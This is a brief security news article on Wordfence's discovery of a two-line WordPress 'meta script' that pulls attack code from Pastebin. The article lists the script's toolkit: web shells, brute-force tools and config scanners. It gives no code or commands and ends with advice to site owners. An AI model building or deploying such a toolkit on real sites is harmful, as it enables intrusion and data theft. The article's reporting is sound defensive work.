Wordfence, maker of one of the most widely used security tools for WordPress, has demonstrated a highly sophisticated WordPress hack attack. The team at Wordfence recently found a number of attack tools that all pointed back to a single “meta script” which consists only two lines of code but provides an attacker with a powerful capability to cause damage.
Once the script fully installs itself, it provides attackers an “attack platform” as referred by Wordfence. Wordfence investigation has revealed that the script was downloading its full source code posted by the attacker(s) on Pastebin. This method of remotely downloading and executing script helps attacker(s) to keep the initially infected code only two lines long.
According to Wordfence, the source of this attacks appears to be a hacking group in Vietnam and one individual within that group.
The “attack platform” can provide an attacker with a suite of 43 attack tools which can be downloaded from Pastebin with a single click.
Attack tools can provide the following functionalities:
Complete attack shells that let you manage the filesystem, access the database through a well designed SQL client, view system information, mass infect the system, DoS other systems, find and infect all CMS’s, view and manage user accounts both on CMS’s and the local operating system and much more.
An FTP brute force attack tool
A Facebook brute force attacker
A WordPress brute force attack script
Tools to scan for config files or sensitive information
Tools to download the entire site or parts thereof
The ability to scan for other attackers shells
Tools targeting specific CMS’s that let you change their configuration to host your own malicious code
Watch the video demonstration of this hack posted by Wordfence below.
If you think your site might have fallen victim to such attacks, it is advisable to take down your site and seek expert help to stop infection from spreading further.